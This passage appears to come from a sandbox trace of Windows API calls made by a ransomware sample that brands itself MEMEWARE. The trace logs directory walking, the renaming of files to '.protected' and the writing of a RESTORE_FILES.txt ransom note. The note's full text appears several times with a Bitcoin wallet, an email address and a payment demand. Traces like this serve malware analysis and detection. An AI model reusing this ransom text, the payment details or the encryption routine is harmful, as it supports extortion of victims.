lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0089.930] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0089.930] CloseHandle (hObject=0x154) returned 1 [0089.930] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx.protected") returned 132 [0089.930] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building 
Blocks.dotx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx.protected")) returned 1 [0089.931] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.931] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.931] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\RESTORE_FILES.txt") returned 110 [0089.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.932] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.932] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.933] lstrlenA (lpString="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") returned 684 [0089.933] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0089.933] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.933] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0089.933] CloseHandle (hObject=0x150) returned 1 [0089.933] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.933] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.933] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\RESTORE_FILES.txt") returned 107 [0089.933] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.934] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.934] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.934] lstrlenA (lpString="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") returned 684 [0089.934] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.935] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.935] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0089.935] CloseHandle (hObject=0x14c) returned 1 [0089.936] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.936] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.936] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\RESTORE_FILES.txt") returned 102 [0089.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.937] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.937] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.937] lstrlenA (lpString="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") returned 684 [0089.937] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.937] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.938] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0089.938] CloseHandle (hObject=0xd8) returned 1 [0089.938] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.938] lstrcmpiW (lpString1="Excel", lpString2="Windows") returned -1 [0089.938] lstrcmpiW (lpString1="Excel", lpString2="Program Files") returned -1 [0089.938] lstrcmpiW (lpString1="Excel", lpString2="Program Files (x86)") returned -1 [0089.938] lstrcmpiW (lpString1="Excel", lpString2="$Recycle.bin") returned 1 [0089.938] lstrcmpiW (lpString1="Excel", lpString2="System Volume Information") returned -1 [0089.938] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel") returned 65 [0089.938] lstrcmpW (lpString1="Excel", lpString2=".") returned 1 [0089.938] lstrcmpW (lpString1="Excel", lpString2="..") returned 1 [0089.938] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\*") returned 67 [0089.938] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.939] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.939] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.939] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.939] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.939] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.939] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\.") returned 67 [0089.939] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.939] FindNextFileW (in: hFindFile=0x47ba50, 
lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.939] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.939] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.939] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.939] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.939] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.939] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\..") returned 68 [0089.939] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.939] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.939] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.939] lstrcmpiW (lpString1="XLSTART", lpString2="Windows") returned 1 [0089.939] lstrcmpiW (lpString1="XLSTART", lpString2="Program Files") returned 1 [0089.939] lstrcmpiW (lpString1="XLSTART", lpString2="Program Files (x86)") returned 1 [0089.939] lstrcmpiW (lpString1="XLSTART", lpString2="$Recycle.bin") returned 1 [0089.939] lstrcmpiW (lpString1="XLSTART", lpString2="System Volume Information") returned 1 [0089.939] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned 73 [0089.939] lstrcmpW (lpString1="XLSTART", lpString2=".") returned 1 [0089.939] lstrcmpW (lpString1="XLSTART", lpString2="..") returned 1 [0089.939] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*") returned 75 [0089.939] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*", lpFindFileData=0x295e7d0 | out: 
lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.940] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.940] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.940] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.940] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.940] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.940] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\.") returned 75 [0089.940] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.940] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.940] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.940] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.940] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.940] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.940] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.940] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\..") returned 76 [0089.940] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.940] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.940] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.940] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.940] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\RESTORE_FILES.txt") returned 91 [0089.940] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\excel\\xlstart\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.941] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.941] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: 
lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.942] lstrlenA (lpString="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") returned 684 [0089.942] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.942] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.942] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0089.942] CloseHandle (hObject=0x14c) returned 1 [0089.942] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.942] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.942] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\RESTORE_FILES.txt") returned 83 [0089.942] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\excel\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.944] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.944] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.945] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.945] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.945] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.945] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.945] CloseHandle (hObject=0xd8) returned 1 [0089.945] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.945] lstrcmpiW (lpString1="IME12", lpString2="Windows") returned -1 [0089.945] lstrcmpiW (lpString1="IME12", lpString2="Program Files") returned -1 [0089.945] lstrcmpiW (lpString1="IME12", lpString2="Program Files (x86)") returned -1 [0089.945] lstrcmpiW (lpString1="IME12", lpString2="$Recycle.bin") returned 1 [0089.945] lstrcmpiW (lpString1="IME12", lpString2="System Volume Information") returned -1 [0089.945] 
wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12") returned 65 [0089.945] lstrcmpW (lpString1="IME12", lpString2=".") returned 1 [0089.945] lstrcmpW (lpString1="IME12", lpString2="..") returned 1 [0089.945] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\*") returned 67 [0089.945] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.946] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.946] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.946] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.946] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.946] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.946] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\.") returned 67 [0089.946] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.946] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.946] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.946] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.946] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.946] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.946] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.946] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
